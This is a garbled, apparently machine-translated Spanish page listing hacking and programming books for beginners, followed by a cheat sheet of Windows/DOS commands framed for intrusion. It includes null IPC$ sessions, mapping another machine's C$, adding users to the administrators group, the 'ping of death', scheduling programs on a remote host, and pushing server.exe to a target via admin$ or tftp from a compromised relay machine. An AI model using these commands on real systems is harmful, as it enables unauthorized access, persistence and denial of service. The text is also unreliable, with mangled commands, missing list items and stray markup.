Colección de citas famosas - Frases elegantes - Quiero aprender informática por mi cuenta. ¿Puedo comprar algunos libros de información básica?

Quiero aprender informática por mi cuenta. ¿Puedo comprar algunos libros de información básica?

1. "Comenzando con la piratería"

Este es el primer libro de piratería que leí. Contiene algunos conocimientos de piratería relativamente básicos, pero los siguientes ejemplos utilizan código html, principalmente Talking. sobre

conocimiento de intrusión de páginas web, no podía entenderlo en ese momento, así que fui a aprender html (en realidad, solo miré el código, no pude escribirlo en absoluto

De qué código viene, jaja...)

2. "Construye un hacker profesional en 30 días"

Cualquier libro que diga que puedes llegar a ser competente. En unos pocos días y convertirse en un maestro rápido en unos pocos días, en realidad no es digno de confianza, pero este no es el tema del que vamos a hablar ahora. Este libro puede compensar las deficiencias del Libro anterior. Hay algunos contenidos que pueden explicarse con más detalle, lo cual es adecuado para principiantes.

3. "Anti-Black Files"

Este libro fue escrito por Dongfang Piaoyun, quien parece ser el subcomandante del Cuerpo Verde Jaja, déjame comentar primero...

4. "Una introducción práctica al ataque y la defensa de los hackers"

Este es un libro de hackers con el combate práctico como línea principal, ¡muy recomendable! ! ! Después de todo, la tecnología informática sólo se puede mejorar en la práctica. La teoría por sí sola no funcionará. Puede leer este libro y utilizarlo, creo que será útil para su capacidad práctica.

Los anteriores son algunos libros introductorios sobre piratería. Algunos de ellos son iguales. ¡Puedes elegir los buenos y seguirlos! ! !

5. "Programación en lenguaje C"

Aquellos que no aprenden programación nunca podrán convertirse en hackers, por lo que aprender programación se ha convertido en la única forma de aprender magia negra. También es el proceso que requiere más energía y resistencia. Este es el escrito por Tan Haoqiang. También puedes leer el libro "el lenguaje de programación C" escrito por un extranjero.

Si puedes depurar y operar los códigos del libro tú mismo, para dominar el lenguaje C. Lo básico no debería ser un problema.

6. "Explicación detallada de VC"

Este es un libro escrito por otros basado en los tutoriales en video de Sun Xin, por lo que este libro también tiene su video adjunto. de la siguiente manera:

/special/0009159F/vc.html

7. "Programación en lenguaje ensamblador IBM-PC"

Esto es una publicación de la Universidad de Tsinghua. está un poco desactualizado, es de la era de las máquinas de 16 bits y es un poco diferente de los actuales win32 y win64, pero su esencia también es similar, creo que para los camaradas que quieran. Para aprender análisis inverso, el ensamblaje también es una buena opción. Con respecto a este libro, puede ver el video tutorial sobre lenguaje ensamblador de la Universidad Sun Yat-sen. El método de enseñanza también es relativamente novedoso. Lo sabrás de un vistazo. La dirección es la siguiente:

/dispbbs_121_164375_1.html

Si quieres ver el vídeo online, puedes verlo en la siguiente dirección: Los fundadores Greg Hoglund y James Butler presentan en detalle cómo el atacante ingresa al sistema

y persiste durante mucho tiempo sin ser detectado, y cómo los piratas informáticos destruyen los sistemas de kernel de Windows XP y Windows 2000.

El concepto se puede aplicar a cualquier sistema operativo convencional moderno. A través de este libro, los lectores pueden dominar completamente los rootkits y mejorar sus propias capacidades de prevención de seguridad informática.

18. "0day Security: Tecnología de análisis de vulnerabilidades de software"

Se publicó recientemente en abril. Leí algunos foros de nieve y aprendí mucho de ellos. Es adecuado para camaradas interesados ​​en el desbordamiento.

Quiero decirte algo de sentido común... aunque hay muchos, ¡todos son básicos! ¡Espero que puedas estudiar mucho!

Comando DOS

net use ipipc$ " " /usuario: " " Establezca un enlace IPC vacío

net use ipipc$ "Contraseña" /usuario: " Nombre de usuario" para establecer un enlace IPC no vacío

net use h: ipc$ "contraseña" /usuario: "nombre de usuario" Después de iniciar sesión directamente, asigne el C: de la otra parte al H local:

net use h: ipc$ Después de iniciar sesión, asigne la otra parte C: al H:

net use ipipc$ /del elimine el enlace IPC

net use h: /del eliminar la asignación de la otra parte al local es la asignación de H:

usuario de red nombre de usuario contraseña/agregar Crear usuario

usuario de red invitado /activo : sí Activar usuario invitado

usuario de red Ver qué usuarios

nombre de cuenta de usuario de red para ver las propiedades de la cuenta

administradores de grupo local de red nombre de usuario/agregar Agregar "usuario" para que el administrador tenga derechos de administrador, nota:

Agregue s después de administrador para hacerlo plural

net start Compruebe qué servicios están habilitados

nombre del servicio net start inicia el servicio (por ejemplo: net start telnet, net start Schedule)

net stop nombre del servicio para detener un servicio

hora neta ip objetivo verificar la hora de la otra parte

net time target ip /set establece la hora de la computadora local y "target IP" La hora del host está sincronizada. Agregue el parámetro /yes para cancelar el mensaje de confirmación

net view para ver cuál. Las VPN están habilitadas en la LAN local

net view ip para ver los privilegios habilitados en la LAN de la otra parte Qué recursos compartidos hay

net config muestra la configuración de red del sistema

net logooff desconecta los recursos compartidos

net pausa nombre del servicio pausa un servicio

net envía ip "mensaje de texto" para enviar información a la otra parte

net Ver el tipo de conexión de red y la información que se utiliza en la LAN

net share para ver el ***share abierto localmente

net share ipc$ Habilitar ipc$***share

net share ipc$ /del Eliminar ipc$***share

net share c$ /del Eliminar C: ***share

net user guest 12345 Después de iniciar sesión como usuario invitado, cambie la contraseña a 12345

contraseña de red cambiar la contraseña de inicio de sesión del sistema

p>

netstat -a para verificar qué puertos están abiertos, netstat de uso común - un

netstat -n para verificar el estado de la conexión de red del puerto, comúnmente usado netstat -an

netstat -v para verificar el Trabajo en progreso

netstat - Ejemplo de nombre de protocolo p: netstat -p tcq/ip Verifique el uso de un determinado protocolo (verifique el uso del protocolo tcp/ip)

netstat -s Verificación en progreso Todos los protocolos utilizados

Situación

nbtstat -A ip Si uno de los puertos 136 a 139 de la otra parte está abierto, puede ver el nombre de usuario del inicio de sesión reciente de la otra parte (el anterior a 03 es el nombre de usuario). Nota: El parámetro -A debe estar en mayúscula

p>

tracert - parámetro ip (o nombre de computadora) ruta de seguimiento (paquete), parámetro: "-w número" se usa para establecer el intervalo de tiempo de espera.

Ping ip (o nombre de dominio) envía datos con un tamaño predeterminado de 32 bytes al otro host Parámetros: "-l [espacio] tamaño del paquete"; "-n número de veces para enviar datos" ; "-t "se refiere a hacer ping todo el tiempo."

ping -t -l 65550 ip ping of death (enviar archivos de más de 64K y hacer ping todo el tiempo se convierte en el ping de la muerte)

ipconfig (winipcfg) para Windows NT y XP (Windows 95 98) Ver la dirección IP local, parámetros disponibles de ipconfig

El número "/all" muestra toda la información de configuración

tlist -t muestra el proceso en una lista de líneas de árbol ( adicionales al sistema) Las herramientas, que no están instaladas de forma predeterminada, se encuentran en la carpeta Soporte/herramientas del directorio de instalación)

kill -F Agregue el parámetro -F al nombre del proceso para forzar el final de un proceso (es una herramienta adicional para el sistema, que no está disponible de forma predeterminada) Instalado, en la carpeta Soporte/herramientas del directorio de instalación)

del -F Nombre del archivo más el parámetro -F puede ser utilizado para eliminar archivos de solo lectura, /AR, /AH, /AS, /AA respectivamente significa eliminar archivos de solo lectura, ocultos, del sistema y de archivo /A-R, /A-

H, /. A-S, /A-A significa eliminar archivos que no sean archivos de solo lectura, ocultos, del sistema y de archivo. Por ejemplo, "DEL/AR *.*" significa eliminar todos los archivos de solo lectura en el directorio actual, y "DEL/A-

S *.*" significa eliminar todos los archivos en el directorio actual. directorio excepto archivos del sistema

p>

Dos:

del /S /Q directorio o use: rmdir /s /Q directorio /S para eliminar el directorio y todos los subdirectorios y archivos bajo el directorio. Al mismo tiempo, utilice el parámetro /Q para cancelar la operación de eliminación del sistema

Eliminar directamente después de la confirmación.

(Los dos comandos tienen el mismo efecto)

mover La ruta de la letra de la unidad es el nombre del archivo que se va a mover. La ruta para almacenar el archivo movido es el nombre del archivo después del movimiento. cancele el mensaje para confirmar que existe el mismo archivo en el directorio movido. Sobrescribir directamente

fc one.txt two.txt gt; Compare los dos archivos y envíe las diferencias al archivo 3st.txt. , "gt;" y "gt; gt;" son comandos de redirección

Comando

en el número de identificación inicia una tarea programada registrada

en /delete detiene todo tareas programadas, y el parámetro /yes no se detiene directamente si necesita confirmación

en el número de identificación/eliminar Detener una tarea programada registrada

en Ver todas las tareas programadas

at ip time nombre del programa (o un comando) /r Ejecute un determinado programa en el otro lado en un momento determinado y reinicie la computadora

finger nombre de usuario @host Compruebe qué usuarios han iniciado sesión recientemente

puerto ip telnet remoto y servidor de inicio de sesión. El puerto predeterminado es 23

open ip se conecta a la IP (un comando después de iniciar sesión en telnet)

telnet Escriba telnet directamente en la máquina local para ingresar al telnet local

copiar ruta nombre de archivo 1 ruta nombre de archivo 2 /y Copie el archivo 1 al directorio especificado como archivo 2. Utilice el parámetro /y para cancelar la confirmación de que desea sobrescribir un archivo de directorio existente

copiar c: srv.exe ipadmin$ Copiar local c:srv.exe al administrador de la otra parte

cppy 1st.jpg/b 2st.txt/a 3st .jpg Ocultar el contenido de 2st.txt en 1st.jpg Generar un nuevo archivo 3st.jpg, nota:

El encabezado del archivo 2st.txt debe tener tres filas vacías, parámetros: /b se refiere a el archivo binario, /a se refiere al archivo en formato ASCLL

copiar ipadmin $svv.exe c: o: copyipadmin$*.* Copiar el archivo srv.exe (todos los archivos

compartido por el administrador de la otra parte$***) a C local:

xcopiar el archivo o árbol de directorios que se va a copiar dirección de destino nombre del directorio para copiar el árbol de archivos y directorios, use el parámetro /Y no aparecerá para sobrescribir el mismo archivo

tftp -i propia IP (esto se usa cuando se usa una máquina de carne como IP de la máquina trampolín) get server.exe c:server.exe Después de iniciar sesión, descargue la "IP"

server.exe al host de destino c:server.exe Parámetro: -i significa transmitir en modo binario, como Se usa al transferir archivos exe. Si no se agrega -i, se transferirá. Modo ASCII

(modo de transferencia de archivos de texto)

tftp -i La IP de la otra parte puso c: server.exe Después de iniciar sesión, cargue c:server.exe local en el host

El puerto ftp ip se utiliza para cargar archivos al servidor o realizar operaciones con archivos. El puerto predeterminado es 21.

bin se refiere a la transmisión en formato binario (entrada de archivo ejecutable); el valor predeterminado es la transmisión en formato ASCII (al escribir este archivo)

la impresión de ruta muestra la ruta IP y mostrará principalmente la dirección de red y la subred. máscara Máscara de red, dirección de puerta de enlace

dirección de puerta de enlace, dirección de interfaz Interfaz

arp Ver y procesar caché ARP ARP significa resolución de nombres y es responsable de resolver una IP en una dirección MAC física. arp -a mostrará toda la información

nombre del programa de inicio o comando /max o /min Abra una nueva ventana y maximice (minimice) ejecute un programa o comando. Se espera que tome O(∩_∩). O